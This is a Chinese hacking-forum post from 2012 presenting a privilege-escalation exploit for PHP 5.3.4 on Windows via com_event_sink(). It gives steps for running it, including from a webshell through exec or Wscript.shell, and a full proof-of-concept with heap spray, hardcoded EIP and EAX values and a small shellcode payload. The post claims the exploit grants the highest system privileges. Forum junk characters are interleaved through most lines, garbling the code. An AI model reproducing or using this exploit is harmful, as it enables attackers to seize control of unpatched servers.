找回密码
 立即注册
欢迎中测联盟老会员回家,1997年注册的域名
查看: 2267|回复: 0
打印 上一主题 下一主题

PHP 5.3.4(WIN) COM_SINK权限提升漏洞

[复制链接]
跳转到指定楼层
楼主
发表于 2012-11-9 21:08:13 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
PHP最新版已经更新至5.4.x,不过中国大陆尚处于在5.2.x和5.3.x更替的阶段。存在漏洞的php存在于5.3.x版本中
- O' e5 A# v! A  l# ?6 w' L/ ^, |( C
测试方法如下:cmd /c x:\php\php.exe x:\test.php8 O& _5 [( b2 ~
  y' G4 Y- }. N2 y' I4 P
下载php程序至本地,然后使用php.exe解析php即可。Webshell上面使用php的exec等函数执行,或者使用Wscript.shell调用cmd.exe然后 /c x:\php\php.exe x:\xxxx\test.php; X1 _2 s, V0 J# B8 B; w  m5 O/ c
这里是两个测试的截图:$ u  ]+ x, g1 @6 m* V
' S) M9 U' D/ [! x& s, F
! T( m8 a5 ?$ Q: p3 {+ C
% ?: _3 y1 k& n0 ?8 k7 |5 j

( W. O7 Q# i8 N' T
1 V) M8 u# O4 _, d成功利用此漏洞的攻击者将获得系统的最高权限
5 H6 q5 V8 {( p7 o- {4 u% U: ]* {" V$ V# z/ r- B$ [
3 |6 `8 ~3 A$ B- X; S
2 ~- J8 h. c. w& K4 f6 h4 H) y

) f: g+ g- J: E
5 T- H, W1 m( \% X# H0 a关于漏洞分析稍后附上。一下是PoC代码:; w" J* |! j+ x% t% T2 g# c

+ R# x- a2 r0 w3 z4 C* s2 H<?php
! J! [4 ?! @% Z//PHP 5.3.4(Win版) com_event_sink()模型权限提升漏洞
" a* r; W( O2 F* H# Q- G% d$ b( }//$eip ="\x44\x43\x42\x41";
5 h  K1 }! q+ I2 M1 P$eip= "\x4b\xe8\x57\x78";
8 Z2 J: p+ h8 K# k$ Y$eax ="\x80\x01\x8d\x04";6 ]" u* n% C7 Z3 t( R0 x
$deodrant="";
# I! E/ w3 Y" t! v* k5 o; p$axespray = str_repeat($eip.$eax,0x80);
* \. H0 E. o$ }9 K; d0 E//048d0190
9 |& M) G  j4 g, y! c/ }% [  D0 necho strlen($axespray);
" A7 z/ V, W: P5 C  g( ?9 c' secho "PHP 5.3.4(WIN) COM_SINK Privilege Escalation\n";" _) {0 H1 v1 C) w& p2 B7 K
echo "Silic Group Hacker Army - BlackBap.Org";
7 W# F6 E2 u6 ^# N. U* i+ F7 ?2 b//19200 ==4B32 4b00
5 r& z# S) i  Ofor($axeeffect=0;$axeeffect<0x4B32;$axeeffect++){$deodrant.=$axespray;}- {/ V" S( i# H+ o( y2 N2 o
$terminate = "T";- K: i! @: t: O5 X6 E
$u[] =$deodrant;# G7 r3 o  i, m. S% ~
$r[] =$deodrant.$terminate;
7 p- D2 V8 \. J. a7 a8 y6 G0 M$a[] =$deodrant.$terminate;
! A" X  }: ?. i$s[] =$deodrant.$terminate;& Q+ N% F. I1 b" i
//$vVar = new VARIANT(0x048d0038+$offset);        这里是可控可改的5 M) S" P+ g+ \8 k5 @2 }
$vVar = new VARIANT(0x048d0000+180);
' j6 ~8 |% ~# V( ]8 V& @, c8 Y//弹窗代码(Shellcode)
& y6 i2 \9 V+ ~5 C% Q* }' i$buffer = "\x90\x90\x90"."\xB9\x38\xDD\x82\x7C\x33\xC0\xBB"."\xD8\x0A\x86\x7C\x51\x50\xFF\xd3";8 Z  t2 M# B8 L5 Q" d7 e
$var2 = new VARIANT(0x41414242);
! W9 O6 b8 B( fcom_event_sink($vVar,$var2,$buffer);6 C1 C' V& s5 z0 \! y, [
?>
% Z- P% Z3 N" K" a- |/ Z

本帖子中包含更多资源

您需要 登录 才可以下载或查看,没有帐号?立即注册

x
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表